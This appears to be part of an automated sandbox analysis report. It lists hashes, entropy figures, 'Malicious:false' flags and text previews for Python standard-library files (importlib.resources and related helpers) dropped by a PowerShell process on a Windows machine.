                                                                                                    MD5:CFE0D87F1513C3989FFAEA94FB498F39
                                                                                                    SHA1:ABA83ABA5E644ECD326FD68CB30B18167F721612
                                                                                                    SHA-256:A31E572E13346401BFF14A2A046DF203B970228C281455819BD11CC2C746F6AE
                                                                                                    SHA-512:9D07B01347F6102D6CD04EC8D8BE97E4A6AD2CFD2874941F738236948B01B7DF7121A446DCE522B19B3405381359CE774513F36E3551E65150DFFADF708EF2ED
                                                                                                    Malicious:false
                                                                                                    Preview:from itertools import filterfalse......def unique_everseen(iterable, key=None):.. "List unique elements, preserving order. Remember all elements ever seen.".. # unique_everseen('AAAABBBCCDAABBB') --> A B C D.. # unique_everseen('ABBCcAD', str.lower) --> A B C D.. seen = set().. seen_add = seen.add.. if key is None:.. for element in filterfalse(seen.__contains__, iterable):.. seen_add(element).. yield element.. else:.. for element in iterable:.. k = key(element).. if k not in seen:.. seen_add(k).. yield element......# copied from more_itertools 8.8..def always_iterable(obj, base_type=(str, bytes)):.. """If *obj* is iterable, return an iterator over its items::.... >>> obj = (1, 2, 3).. >>> list(always_iterable(obj)).. [1, 2, 3].... If *obj* is not iterable, return a one-item iterable containing *obj*::.... >>> obj = 1.. >>> list(always_ite
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1653
                                                                                                    Entropy (8bit):4.669384473845916
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1RENC8Hr9tYIWOtG8hJsLozyFLJb5ZtR4BWYvcqjUFixt3hH:QJL9aIrttPsLo+Vb7tR4gec2j3l
                                                                                                    MD5:29DC2D3706499F5BD1DCBE6ABD1E6A06
                                                                                                    SHA1:94531A6B069A2C88AFC14F6D0A060BE3157844DE
                                                                                                    SHA-256:D84BAADE84952A90014A0FDB70BE6716726E669A897D7C261EA99E38385BB62E
                                                                                                    SHA-512:8D90E3D2D45BA1636A6AC61A8C1A7F9473B2D70DD2329879013946ECAB4E4342EB9471D2F3308FCF70A020C28872A40FD8152ED113B892194E56AA4DEFD5BCC6
                                                                                                    Malicious:false
                                                                                                    Preview:from typing import Protocol..from typing import Any, Dict, Iterator, List, Optional, TypeVar, Union, overload......_T = TypeVar("_T")......class PackageMetadata(Protocol):.. def __len__(self) -> int:.. ... # pragma: no cover.... def __contains__(self, item: str) -> bool:.. ... # pragma: no cover.... def __getitem__(self, key: str) -> str:.. ... # pragma: no cover.... def __iter__(self) -> Iterator[str]:.. ... # pragma: no cover.... @overload.. def get(self, name: str, failobj: None = None) -> Optional[str]:.. ... # pragma: no cover.... @overload.. def get(self, name: str, failobj: _T) -> Union[str, _T]:.. ... # pragma: no cover.... # overload per python/importlib_metadata#435.. @overload.. def get_all(self, name: str, failobj: None = None) -> Optional[List[Any]]:.. ... # pragma: no cover.... @overload.. def get_all(self, name: str, failobj: _T) -> Union[List[Any], _T]:.. """.. R
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2265
                                                                                                    Entropy (8bit):4.649909401623028
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:BUu/H8O42w9/2kz8/WVy1wux7QcY5Djwa7TrbjmfVbp5bWYjE7faS5Egwz0u3v:BUM8O1w9/2kz8/W41wA7QcenFq1R3v
                                                                                                    MD5:EFD66631577D71C781E1C625F9F41FDA
                                                                                                    SHA1:BE295E4B93AD7EC6471FE64A3B6403E96FF58F63
                                                                                                    SHA-256:7E89957A504AED6B3F93B0718CA881B6CA9F8D0BF961701B0C0A37A3B55EAACD
                                                                                                    SHA-512:D6FA08CE02D1BDDA89B2E65AFC8B14E9965140573955AF45CD12FF2DBE15F1BE6DAE879622E75424E68E18AB9E97A368CF197253EBA6A0B7241A3031E758C0CE
                                                                                                    Malicious:false
                                                                                                    Preview:import re....from ._functools import method_cache......# from jaraco.text 3.5..class FoldedCase(str):.. """.. A case insensitive string class; behaves just like str.. except compares equal when the only variation is case..... >>> s = FoldedCase('hello world').... >>> s == 'Hello World'.. True.... >>> 'Hello World' == s.. True.... >>> s != 'Hello World'.. False.... >>> s.index('O').. 4.... >>> s.split('O').. ['hell', ' w', 'rld'].... >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])).. ['alpha', 'Beta', 'GAMMA'].... Sequence membership is straightforward..... >>> "Hello World" in [s].. True.. >>> s in ["Hello World"].. True.... You may test for set inclusion, but candidate and elements.. must both be folded..... >>> FoldedCase("Hello World") in {s}.. True.. >>> s in {FoldedCase("Hello World")}.. True.... String inclusion works as long as the FoldedCase object.. is on the right..... >>> "hello"
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):339
                                                                                                    Entropy (8bit):4.793460663096757
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:INgUrW/EmFqMz/ZWJaM+zowdXLXzLW/MxCgtdzJG4Vdi03AoiDiOB544V1hre:IrUEyqs1zH5jnUMxptdz44HYDiOn44Tk
                                                                                                    MD5:38015D56A79137F7CB169139F2CC2C82
                                                                                                    SHA1:EAF4A1DB5061E83C8FD33C21E51A3921BC535997
                                                                                                    SHA-256:5FB5AE1DCF4C24BDDDCEF0487DC0F5E9A7917C5280E7A993617A96C1FFF25730
                                                                                                    SHA-512:0C039DCF0EFA48921D18C20020AEE210E104BB959E8C239CDB6990C0BDC489D2ECF4EF9A4BA0C837D70B97E3FD8C7B6CD09B3C71D2CC8A1FDB019AE1E35AAAE7
                                                                                                    Malicious:false
                                                                                                    Preview:"""..Compatibility shim for .resources.readers as found on Python 3.10.....Consumers that can rely on Python 3.11 should use the other..module directly..."""....from .resources.readers import (.. FileReader, ZipReader, MultiplexedPath, NamespaceReader,..)....__all__ = ['FileReader', 'ZipReader', 'MultiplexedPath', 'NamespaceReader']..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):542
                                                                                                    Entropy (8bit):4.405609390874925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:S6JNiV55uud2X4Jf40+yGtOUxADonYlJoVW/dXCBIOtcTy+:pJNQ50cJfF+y8OqnYlsW4cTh
                                                                                                    MD5:4C88EC58675223F93130B8C91BD01019
                                                                                                    SHA1:DA55D65401FDD729E8BA3B9C4F26488B753F2A79
                                                                                                    SHA-256:09FF374BDF81082CC52EA40C0F6ED172342BD6533A0196E4642CCE52B9852FF1
                                                                                                    SHA-512:164AB05B60AEB38D1E8E83229BC119208A8002CED939F8190CD8782C74D77EEA4BDA5D391DEBA628037F3A13A45ADDCA27436677FBF725298C6DC8CF055A9D03
                                                                                                    Malicious:false
                                                                                                    Preview:"""Read resources contained within a package."""....from ._common import (.. as_file,.. files,.. Package,..)....from ._legacy import (.. contents,.. open_binary,.. read_binary,.. open_text,.. read_text,.. is_resource,.. path,.. Resource,..)....from .abc import ResourceReader......__all__ = [.. 'Package',.. 'Resource',.. 'ResourceReader',.. 'as_file',.. 'contents',.. 'files',.. 'is_resource',.. 'open_binary',.. 'open_text',.. 'path',.. 'read_binary',.. 'read_text',..]..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):654
                                                                                                    Entropy (8bit):5.198131057863074
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:hcnl0iCSBOToVYbcjPi6MCxfXhMY4myyxOHt28sWnBI5CebaYtY3fet:hcl/C90VYGP5M6M5myyxOHA8nFVaY36
                                                                                                    MD5:2774A0462C6F5350C2BB492ED75DFD82
                                                                                                    SHA1:9A771BB97EEEEAB737ABD41FC376C2B3799DAA1C
                                                                                                    SHA-256:8D51041CEB33F272F9AE124373AA38C366D5808D49B80E97DA38C61F29D8AEDC
                                                                                                    SHA-512:527856B358DAD98FEABDDB13C28C705A19462AAE9A99985BDB44CEB5AC11A94D68024B2C8683F5F4D010CEC6833B37CDC3E0F05B5EC3DA93E86B18D52B21D436
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..........................X.....d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.y.).z*Read resources contained within a package......)...as_file..files..Package)...contents..open_binary..read_binary..open_text..read_text..is_resource..path..Resource)...ResourceReader).r....r....r....r....r....r....r....r....r....r....r....r....N)...__doc__.._commonr....r....r......_legacyr....r....r....r....r....r....r....r......abcr......__all__........ZC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\resources\__init__.py..<module>r........s-..........0............................. .......r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9665
                                                                                                    Entropy (8bit):4.886223930886199
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:wlawOb2TuDuJg8jJBivDs9ECvQWxxU0dfXJlPMJ6JVdSORSA0LNPqPUxJIO7+jOv:Q7AzDuNj+vwEfOndfj0CyAcPDJ971ehw
                                                                                                    MD5:2F063F62D9A7D1CC797315B28A98B9A1
                                                                                                    SHA1:5A2EA440447E71A91A18ED118DA60BEBE78315D3
                                                                                                    SHA-256:491C6D9C4A7741DDA2933A176F36723C79D6BC923A6C199B509DD347A3FB9941
                                                                                                    SHA-512:7B85E1CAA61FDE7CF3D0FC19E870CD66D298DE63D23754CE2E23C0C8C1BF360F4F85E71040DAC22CD6B746F5150E30F01DABBDCA723B6527EAA3DF1FB68A1931
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f*.........................r.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z...G.d...d.........Z.d.d...Z...G.d...d.........Z.d...Z.y.)......)...suppress)...TextIOWrapper.....)...abcc.....................".....e.Z.d.Z.d.Z.d...f.d...Z.d...Z.y.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c...........................|.j...................S...N)...loader....specs.... .[C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\resources\_adapters.py..<lambda>z.SpecLoaderAdapter.<lambda>....s.......$.+.+.......c.....................,.....|.|._...........|.|.........|._.........y.r....).r....r....)...selfr......adapters.... r......__init__z.SpecLoaderAdapter.__init__....s.................d.m....r....c...........................t.........|.j...................|.........S.r....)...getattrr......r......names.... r......__getattr__z.SpecLoaderAdapter.__getattr__....s..........t.y.y.$..'..'r....N)...__name__..__module__.._
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8750
                                                                                                    Entropy (8bit):5.129854591592077
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Qd5+d0XTItslL3RhUzspJWi/RcVEedBJaGSmnubh05BhQbNQ8TAd2:QP+dIyslL3HUzspJWi2WedLaGg9010Qy
                                                                                                    MD5:192183DBBE13740895C47811615CECC3
                                                                                                    SHA1:3565DBB1B81CBB766E5D0BD03BBE9B143C76DE39
                                                                                                    SHA-256:43A86CE309E05DBBF0AB241E7F963CC4CAA4C64DA3B687CE7B9F60FF15E20749
                                                                                                    SHA-512:C1A422D0A611EC1D56BC9C7327805595CD739B896282C3A56AABBB71CFC66BDFEEB750F94ED740F972DEB0C5E31F607DCA680110595BF13CBE90F98509453764
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f".........................2.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j&..................e.f.....Z.e.Z.d...Z.e.d.d.e.e.....d.e.f.d...........Z.d.e.j&..................d.e.e.....f.d...Z.e.j4..................d.e.e.....d.e.j&..................f.d...........Z.e.j8..................d.e.d.e.j&..................f.d...........Z.e.j8..................d.d.d.e.j&..................f.d...........Z.d...Z.d.e.j&..................f.d...Z.e.j@....................d.e.jB..................d...d...........Z"d...Z#d.e.d.e$f.d...Z%e.j4..................d...........Z&e&j9..................e.jN..........................e.j@..................d...................Z.e.j@..................d.e.jP..................f.d...........Z)e.j@..................d...........Z*d...Z+y.)......N)...Union..Optional..cast.....)...ResourceReader..Traversable)...wrap_specc.....................`.........t...................t.....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1578
                                                                                                    Entropy (8bit):5.54373693949275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:hWBKSJoSXFQMS3LJw1BI93wmq9sVC0vMByBh5FsJ7dFpeTRK5:EXlTB9sg0v8mrsJ7dF4K5
                                                                                                    MD5:81C250FE3023A56C10CB4061DDF41C5E
                                                                                                    SHA1:0709AFE2335D5BAD84291DA6F93205FF0F863EDD
                                                                                                    SHA-256:D2D20BEBEA50FE618F7D1C085C812E644017C0EC549EED52C56C02A183A3456E
                                                                                                    SHA-512:FE926DE0EAFCD6D9D35FFD3EA1466AED917C52E1BF357FDD54119DE8619B2FB1CDFB9104CF8560BA61CB11A1C567DD5BF71E4A0B3072E455DF8E04CEEA6F64D8
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f#...............................d.d...Z.y.).Nc..........................t.........|.........}.t.........|.|.........}...t.........|.........}.d.j...................|.|.........}.|.x.s...t.........|...........#.t.........$.r...Y.|.S.w.x.Y.w.).a(...If *iterable* has only one item, return it.. If it has zero items, return *default*.. If it has more than one item, raise the exception given by *too_long*,. which is ``ValueError`` by default.. >>> only([], default='missing'). 'missing'. >>> only([1]). 1. >>> only([1, 2]) # doctest: +IGNORE_EXCEPTION_DETAIL. Traceback (most recent call last):. .... ValueError: Expected exactly one item in iterable, but got 1, 2,. and perhaps more.'. >>> only([1, 2], too_long=TypeError) # doctest: +IGNORE_EXCEPTION_DETAIL. Traceback (most recent call last):. .... TypeError. Note that :func:`only` attempts to advance *iterable* twice to ensure there. is only one item. See :func:`spy` or :fun
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5782
                                                                                                    Entropy (8bit):5.307330315393467
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:I9nWzimJ9trwNKl9/wNkmtTCmyTlqTJYjb2yz0l9mJ7NOeLtojqjBfnY2iw:I9nWziq9tsNKl94DtOmttYP249XroAnH
                                                                                                    MD5:DED903550F158E97CCA0718E7C9D9814
                                                                                                    SHA1:0048B491103E3298C3632A751F8C8D8E896A327F
                                                                                                    SHA-256:37224082BF88E8700C4FAB0FE2BF7593FE963BF89BFCDD4FA1C2AED865CA6743
                                                                                                    SHA-512:C915AB87D3DEBB5E0BFDD8D7495DB3B3310FF9CE31E1B36D4DED26663C25773C6651750D546940DA40FB242504726C81E1985570EBC3429F0F503B8EF9481FD1
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.e.j...................e.f.....Z.e.Z.d...Z.d.e.d.e.f.d...Z.e.d.e.d.e.d.e.f.d...........Z.e.d.e.d.e.d.e.f.d...........Z.e.....d.d.e.d.e.d.e.d.e.d.e.f.d...........Z.e.....d.d.e.d.e.d.e.d.e.d.e.f.d...........Z.e.d.e.d.e.e.....f.d...........Z.e.d.e.d.e.d.e.f.d...........Z.e.d.e.d.e.d.e.e.j8......................f.d...........Z.y.)......N)...Union..Iterable..ContextManager..BinaryIO..TextIO..Any.....)..._commonc.....................B.......t.........j...............................f.d...........}.|.S.).Nc.....................f.......t.........j.....................j.....................d...t.........d.................|.i.|.....S.).Nz. is deprecated. Use files() instead. Refer to https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy for migration advice......)...stacklevel)...warnings..warn..__name__..DeprecationWarning)...args..kwar
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8960
                                                                                                    Entropy (8bit):5.135086999590449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:pKnhstTDABD9d5m0ZFoHH2dQIbWsfN24vJ0:ptdA604XE0q2
                                                                                                    MD5:240EFEBB6094D452F184A45683491771
                                                                                                    SHA1:F3DE72C58ECA3F455D70A44BBF6D4DC8C04CAE2D
                                                                                                    SHA-256:359A4B1E18AB3E45FC44EB4D4D4332BF4B8E053846DF4970035DC861C071139B
                                                                                                    SHA-512:C536B1E53DE4C024CA2F6A77C95A6EB6CBCCB7C62912751CE478BD8F8846E144D4D3099DF7D68245C230B772314451914B21451A0547FD8DD024297A0FEB8F2A
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.e.j"..................e.....f.....Z.g.d...Z...G.d...d.e.j(............................Z...G.d...d.e.........Z.e...G.d...d.e.................Z...G.d...d.e.........Z.y.)......N)...Any..BinaryIO..Iterable..Iterator..NoReturn..Text..Optional)...runtime_checkable..Protocol)...Union)...ResourceReader..Traversable..TraversableResourcesc...........................e.Z.d.Z.d.Z.e.j...................d.e.d.e.f.d...........Z.e.j...................d.e.d.e.f.d...........Z.e.j...................d.e.d.e.f.d...........Z.e.j...................d.e.e.....f.d...........Z.y.).r....zDAbstract base class for loaders to provide resource reading support...resource..returnc...........................t...........).z.Return an opened, file-like object for binary reading... The 'resource' argument is expected to represent only a file name.. If the resou
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8933
                                                                                                    Entropy (8bit):5.014522239791881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:5PfDS58alVNMBTuuJ4p/7QgDzEfffQo7sqCPAS4a+fIsV+2jq:df25rNMBCuIFm4T2O
                                                                                                    MD5:3043BDE5ADC5703DCA6382206C38D4AB
                                                                                                    SHA1:2E26CD822234011BA93E078C7F9EB2C75FB880A8
                                                                                                    SHA-256:91EAC23C954068F36986BFDF00E5C3FAEA6971FFD8745DE255CB2D348A34C33B
                                                                                                    SHA-512:D2AD60BD8BA7E716347B5C20B59BB54C0F5CD9EBE18BFDA1112A4E3094DD623F2149F03FE3DCFAD1C75D0D2105EF8D15271D7827D52ED17F38DC0BE263B6BD86
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f_...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.y.)......N.....)...abc)...onlyc.....................R.....t.........t.........j...................j...................|.................S...N)...iter..collections..OrderedDict..fromkeys)...itemss.... .YC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\resources\readers.py..remove_duplicatesr........s.............'..'..0..0....7..8..8.....c...........................e.Z.d.Z.d...Z.d...Z.d...Z.y.)...FileReaderc.....................`.....t.........j...................|.j...........................j...................|._.........y.r....)...pathlib..Path..path..parent)...self..loaders.... r......__init__z.FileReader.__init__....s..........L.L........-..4..4....r....c.....................J.....t.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4650
                                                                                                    Entropy (8bit):4.366030348359478
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qE644hrU2ksTZpvIbGK/Lm//LgaPOUkGCVWOHqcznMqf:AhrU5sNpvDK/I/ZPO/GCZHqsMqf
                                                                                                    MD5:CF4C239F8AA86FC461C68622C4F3C8CC
                                                                                                    SHA1:19A8DAD58DA165E1C655A47649BC8DF7D7146C34
                                                                                                    SHA-256:570783F57345F54C4348F1906BE59DDED85159B31AB92FD5D7EF80FE36156BBC
                                                                                                    SHA-512:1D9752AAC74D391FADDE817B4027B3C519774283174BB3AD77A4F3BCE303FEF2F821752D90A20C19FEEE2A34663F89F724DD3FE0003409DB8207D2BA1104546A
                                                                                                    Malicious:false
                                                                                                    Preview:from contextlib import suppress..from io import TextIOWrapper....from . import abc......class SpecLoaderAdapter:.. """.. Adapt a package spec to adapt the underlying loader... """.... def __init__(self, spec, adapter=lambda spec: spec.loader):.. self.spec = spec.. self.loader = adapter(spec).... def __getattr__(self, name):.. return getattr(self.spec, name)......class TraversableResourcesLoader:.. """.. Adapt a loader to provide TraversableResources... """.... def __init__(self, spec):.. self.spec = spec.... def get_resource_reader(self, name):.. return CompatibilityFiles(self.spec)._native()......def _io_wrapper(file, mode='r', *args, **kwargs):.. if mode == 'r':.. return TextIOWrapper(file, *args, **kwargs).. elif mode == 'rb':.. return file.. raise ValueError(f"Invalid mode value '{mode}', only 'r' and 'rb' are supported")......class CompatibilityFiles:.. """.. Adapter for an existing or no
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5666
                                                                                                    Entropy (8bit):4.65663491701135
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Cx8GjAvLHnDAhS89SFZIyHf4mbA+UC1d/mWEBP1J2HE3VIXH/ZR9Q3/2EkqRZxzd:Cb2Gv9gLf4mUxC1d+fBPuHE3VIXHRRC9
                                                                                                    MD5:C504069E4691E456C488DFB7515B3741
                                                                                                    SHA1:4538122DE68757CF58EE7DD3F03D24DE43B22AA4
                                                                                                    SHA-256:FE1554DC2BC912808BB2697D36726B71A0F0CF93984471A578C52673C4141ED5
                                                                                                    SHA-512:7F7547A8F3A0299465A720E44099254BE9735A64AEAB8163368B061C6F74BD9448A177D7B2ECFED356B38BF3C6FA42D128273BF490F266B9CC8B3F4081B9DF6F
                                                                                                    Malicious:false
                                                                                                    Preview:import os..import pathlib..import tempfile..import functools..import contextlib..import types..import importlib..import inspect..import warnings..import itertools....from typing import Union, Optional, cast..from .abc import ResourceReader, Traversable....from ._adapters import wrap_spec....Package = Union[types.ModuleType, str]..Anchor = Package......def package_to_anchor(func):.. """.. Replace 'package' parameter as 'anchor' and warn about the change..... Other errors should fall through..... >>> files('a', 'b').. Traceback (most recent call last):.. TypeError: files() takes from 0 to 1 positional arguments but 2 were given.. """.. undefined = object().... @functools.wraps(func).. def wrapper(anchor=undefined, package=undefined):.. if package is not undefined:.. if anchor is not undefined:.. return func(anchor, package).. warnings.warn(.. "First parameter to files is renamed to 'anchor'",..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1315
                                                                                                    Entropy (8bit):4.769536521565181
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:VpcExocjBVVJJwOBEVaJq91VCZF16OmXkKZdBL4gos:7fV+SEl91gZF16HhLBos
                                                                                                    MD5:3E324E7E7C9F78C12B5896CE5EAED29C
                                                                                                    SHA1:82A915F32E36CC70D447E8A070627F27E5C87DC9
                                                                                                    SHA-256:D509A9DA20DC9619FD2AC63F30CC088599995D3E1B38B1EE5AA68FB697DE8897
                                                                                                    SHA-512:48DB1AA5CB305D99E98D1E396454812052A7FA9CB5C53BBC30CD8F4B90DC2F031C8E4F42CE0CA883E0A1BDB2222B240F48802B460DD8B2753A6B1896C7FB7BA8
                                                                                                    Malicious:false
                                                                                                    Preview:# from more_itertools 9.0..def only(iterable, default=None, too_long=None):.. """If *iterable* has only one item, return it... If it has zero items, return *default*... If it has more than one item, raise the exception given by *too_long*,.. which is ``ValueError`` by default... >>> only([], default='missing').. 'missing'.. >>> only([1]).. 1.. >>> only([1, 2]) # doctest: +IGNORE_EXCEPTION_DETAIL.. Traceback (most recent call last):.. ..... ValueError: Expected exactly one item in iterable, but got 1, 2,.. and perhaps more.'.. >>> only([1, 2], too_long=TypeError) # doctest: +IGNORE_EXCEPTION_DETAIL.. Traceback (most recent call last):.. ..... TypeError.. Note that :func:`only` attempts to advance *iterable* twice to ensure there.. is only one item. See :func:`spy` or :func:`peekable` to check.. iterable contents less destructively... """.. it = iter(iterable).. first_value = next(it, default).... try:.. s
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3601
                                                                                                    Entropy (8bit):4.695501803485121
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:gi899q0MTty/UuRfAVfKVEODgEdr0GolnN02qPfyRG:gaBTg/9ZAFKWOBd0GolN026yRG
                                                                                                    MD5:C6783656BCAF6DF484F007E8E322EE7A
                                                                                                    SHA1:6F11C1CD08C4731AED995774D8765409FFE4AE21
                                                                                                    SHA-256:3A0FF12B9FA46E82847D8709A756B3531BAC8BE10916DACFAE7B1A8570362DA2
                                                                                                    SHA-512:8D0802368FCCA56E2DFF0EFD487AF62B3E3C845CCD3A36E9347DAF9AA35092550E640D443DA60FD01464534144DD8F3E1E41B71AC24FF07B432DED27F4E984B7
                                                                                                    Malicious:false
                                                                                                    Preview:import functools..import os..import pathlib..import types..import warnings....from typing import Union, Iterable, ContextManager, BinaryIO, TextIO, Any....from . import _common....Package = Union[types.ModuleType, str]..Resource = str......def deprecated(func):.. @functools.wraps(func).. def wrapper(*args, **kwargs):.. warnings.warn(.. f"{func.__name__} is deprecated. Use files() instead. ".. "Refer to https://importlib-resources.readthedocs.io".. "/en/latest/using.html#migrating-from-legacy for migration advice.",.. DeprecationWarning,.. stacklevel=2,.. ).. return func(*args, **kwargs).... return wrapper......def normalize_path(path: Any) -> str:.. """Normalize a path by ensuring it is a string..... If the resulting string contains path separators, an exception is raised... """.. str_path = str(path).. parent, file_name = os.path.split(str_path).. if parent:.. raise ValueError
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5376
                                                                                                    Entropy (8bit):4.505175660902373
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:EfRHVKW/YO/Kmu96frLOmzFn+IKetz7P6:EzK+uIGmBn+IKetzO
                                                                                                    MD5:4CD3C9FC84D12E05946043AAB3539FAB
                                                                                                    SHA1:78CBCE0C7330CFA5FDD6E3EBECE5F8955BBF2112
                                                                                                    SHA-256:F66D4D78AE31FF360C36F18BE66000326AACAFB4CE851C5B10648B7C75F42333
                                                                                                    SHA-512:F2155A454A346C3F56BD0085A58A3A5B7366DB552B49EEC2B4D0CB28E0D788CA7BFEBA26E1342356C93119CE274215DCF547511F67D60CB162A99F27A89B5069
                                                                                                    Malicious:false
                                                                                                    Preview:import abc..import io..import itertools..import os..import pathlib..from typing import Any, BinaryIO, Iterable, Iterator, NoReturn, Text, Optional..from typing import runtime_checkable, Protocol..from typing import Union......StrPath = Union[str, os.PathLike[str]]....__all__ = ["ResourceReader", "Traversable", "TraversableResources"]......class ResourceReader(metaclass=abc.ABCMeta):.. """Abstract base class for loaders to provide resource reading support.""".... @abc.abstractmethod.. def open_resource(self, resource: Text) -> BinaryIO:.. """Return an opened, file-like object for binary reading..... The 'resource' argument is expected to represent only a file name... If the resource cannot be found, FileNotFoundError is raised... """.. # This deliberately raises FileNotFoundError instead of.. # NotImplementedError so that if this method is accidentally called,.. # it'll still do the right thing... raise FileNotFoundError..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4447
                                                                                                    Entropy (8bit):4.528929673079825
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:NZKcTSJI0J8mEbHt5sr4d8NvQCd5LHnorJeAi:NRSf3EbHtCrY8NvQCbLHor8L
                                                                                                    MD5:FF26E45B1D6849065272607BF12C7016
                                                                                                    SHA1:5E27C831CBD6431C8D89520C83C2024810007D9C
                                                                                                    SHA-256:3E447AA8A544F61ED834FBD3720CA6991843E8DE60D50C5E002A9B473EDB8AE3
                                                                                                    SHA-512:DEF1011D4E9E758E08F78416D927551CDF3D1A0EC894441F2D10C79B60AC05F970C37DAFA6A614B5F3C4C762769038DDE6ED1D16A32AB1A7B9C9385FD965E02C
                                                                                                    Malicious:false
